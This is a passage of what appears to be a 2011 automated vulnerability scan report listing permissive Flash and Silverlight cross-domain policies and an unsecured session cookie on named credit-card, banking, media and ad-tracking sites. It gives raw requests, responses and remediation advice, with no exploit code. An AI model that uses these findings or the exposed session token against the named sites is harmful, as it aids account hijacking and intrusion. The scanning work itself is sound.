Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Fri, 17 Jun 2011 11:58:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 14 Jun 2011 21:58:43 GMT
ETag: "6f08145-ca-4a5b323ab4ac0"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

4.13. http://www.creditcards.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:27 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:38 GMT
ETag: "925bac-94-46712311e8a80"
Accept-Ranges: bytes
Content-Length: 148
Vary: Accept-Encoding
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.imgsynergy.com"/>
</cross-domain-policy>

4.14. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=50
Expires: Fri, 17 Jun 2011 12:32:13 GMT
Date: Fri, 17 Jun 2011 12:31:23 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.15. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Thu, 16 Jun 2011 21:25:21 GMT
Expires: Fri, 17 Jun 2011 21:25:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 52426
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.16. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=111
Expires: Fri, 17 Jun 2011 12:33:13 GMT
Date: Fri, 17 Jun 2011 12:31:22 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.17. http://oc.creditcards.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oc.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:08 GMT
Server: Apache
Last-Modified: Fri, 20 Feb 2009 18:56:12 GMT
ETag: "167cd7-e3-4635e34dfcb00"
Accept-Ranges: bytes
Content-Length: 227
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.imgsynergy.com" />
<allow-access-from domain="*.creditcards.com" />
<allow-access-from domain="*.netfiniti.com" />
...[SNIP]...

4.18. http://s46.sitemeter.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: s46.sitemeter.com

Response

HTTP/1.1 200 OK
Content-Length: 219
Content-Type: text/xml
Last-Modified: Wed, 25 Oct 2006 21:31:00 GMT
Accept-Ranges: bytes
ETag: "025bdd7cf8c61:8c69"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 17 Jun 2011 11:58:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sitemeter.com" />
</cro
...[SNIP]...

4.19. http://www.discovercard.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.discovercard.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.discovercard.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:01 GMT
Server: Apache
Last-Modified: Tue, 18 Nov 2008 14:36:53 GMT
Accept-Ranges: bytes
Content-Length: 1882
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="discovercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.discovercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abc.com"/>
<allow-access-from domain="ll.media.abc.com"/>
<allow-access-from domain="abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dynamic.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dynamic.myabcdev.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.myabcdev.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.media.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.media.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.static.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.static.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbs.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nbc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nbcuni.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clearspring.com" secure="false"/>
...[SNIP]...

4.20. https://www.discovercard.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.discovercard.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:43 GMT
Server: Apache
Last-Modified: Tue, 18 Nov 2008 14:36:53 GMT
Accept-Ranges: bytes
Content-Length: 1882
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="discovercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.discovercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abc.com"/>
<allow-access-from domain="ll.media.abc.com"/>
<allow-access-from domain="abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dynamic.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dynamic.myabcdev.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.myabcdev.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.media.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.media.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.static.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ll.static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.static.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.static.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.verdict.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbs.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nbc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nbcuni.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clearspring.com" secure="false"/>
...[SNIP]...

4.21. http://www.wtp101.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtp101.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Fri, 17 Jun 2011 12:12:24 GMT
ETag: 1300114347320
LastModified: Mon, 14 Mar 2011 14:52:27 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

4.22. http://www201.americanexpress.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www201.americanexpress.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www201.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:03 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 31 Oct 2006 05:40:47 GMT
ETag: "3057-122-d404f5c0"
Accept-Ranges: bytes
Content-Length: 290
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aexp.com" secure="true" />

...[SNIP]...
<allow-access-from domain="*.americanexpress.com" secure="true" />
...[SNIP]...

4.23. https://www201.americanexpress.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www201.americanexpress.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www201.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:48 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 31 Oct 2006 05:39:34 GMT
ETag: "3057-122-cfab1180"
Accept-Ranges: bytes
Content-Length: 290
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aexp.com" secure="true" />

...[SNIP]...
<allow-access-from domain="*.americanexpress.com" secure="true" />
...[SNIP]...

4.24. http://citi.bridgetrack.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Fri, 17 Jun 2011 12:14:01 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

4.25. http://creditcards.citicards.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: creditcards.citicards.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Server:
Date: Fri, 17 Jun 2011 12:13:02 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 9 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://americanexpress.122.2o7.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://cctrkom.creditcards.com/clientaccesspolicy.xml
http://creditcardscom.112.2o7.net/clientaccesspolicy.xml
http://integrate.112.2o7.net/clientaccesspolicy.xml
http://metrics.citibank.com/clientaccesspolicy.xml
http://omn.americanexpress.com/clientaccesspolicy.xml
http://pixel.33across.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Fri, 17 Jun 2011 12:04:21 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://americanexpress.122.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://americanexpress.122.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: americanexpress.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:44 GMT
Server: Omniture DC/2.0.0
xserver: www276
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Sat, 18 Jun 2011 11:59:07 GMT
Date: Fri, 17 Jun 2011 11:59:07 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.4. http://cctrkom.creditcards.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cctrkom.creditcards.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cctrkom.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:35 GMT
Server: Omniture DC/2.0.0
xserver: www433
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://creditcardscom.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://creditcardscom.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: creditcardscom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:08 GMT
Server: Omniture DC/2.0.0
xserver: www175
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://integrate.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://integrate.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:28 GMT
Server: Omniture DC/2.0.0
xserver: www98
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://metrics.citibank.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.citibank.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:13:58 GMT
Server: Omniture DC/2.0.0
xserver: www17
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.8. http://omn.americanexpress.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://omn.americanexpress.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omn.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:33 GMT
Server: Omniture DC/2.0.0
xserver: www260
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.9. http://pixel.33across.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012417000"
Last-Modified: Fri, 18 Feb 2011 07:00:17 GMT
Content-Type: application/xml
Content-Length: 335
Date: Fri, 17 Jun 2011 11:59:08 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

6. SSL cookie without secure flag set previous next
There are 7 instances of this issue:

https://application.capitalone.com/icoreapp/jsp/landing.jsp
https://www.applyonlinenow.com/USCCapp/Ctl/display
https://www.applyonlinenow.com/USCCapp/Ctl/entry
https://www.applyonlinenow.com/USCCapp/Ctl/validate
https://www.discovercard.com/cardmembersvcs/registration/reg/goto
https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0
https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

6.1. https://application.capitalone.com/icoreapp/jsp/landing.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/jsp/landing.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=7R2PN7BWkq05FB2nsTl1DjYPsgvXT2vPp222kzwTp1ZqXy1729fJ!-968881363; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
